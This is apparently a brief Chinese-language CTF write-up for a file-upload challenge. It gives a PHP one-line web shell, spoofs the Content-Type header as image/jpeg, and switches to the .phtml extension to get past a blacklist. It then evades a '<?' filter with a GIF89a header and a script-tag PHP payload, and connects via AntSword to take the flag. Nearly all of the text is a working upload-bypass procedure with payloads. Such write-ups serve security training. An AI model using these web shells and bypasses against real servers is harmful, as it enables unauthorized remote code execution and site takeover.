首先打开网址之后是一个文件上传
直接上传一句话木马
<?php @eval($_POST['attack']);?>
然后我们抓包改成Content-Type:image/jpeg
之后又发现其对文件后缀名进行了限制过滤了(绕过的方法php3,php4,php5,phtml,pht)
发现php3,php4,php5被过滤了将文件后缀改成phtml就可以
发现文件里面不允许包含<?
那么绕过
GIF89a? <script language="php">eval($_REQUEST[1])</script>
上传成功
接下来找文件路径
基本都是upload/filename
然后找到路径使用蚁剑连接
getflag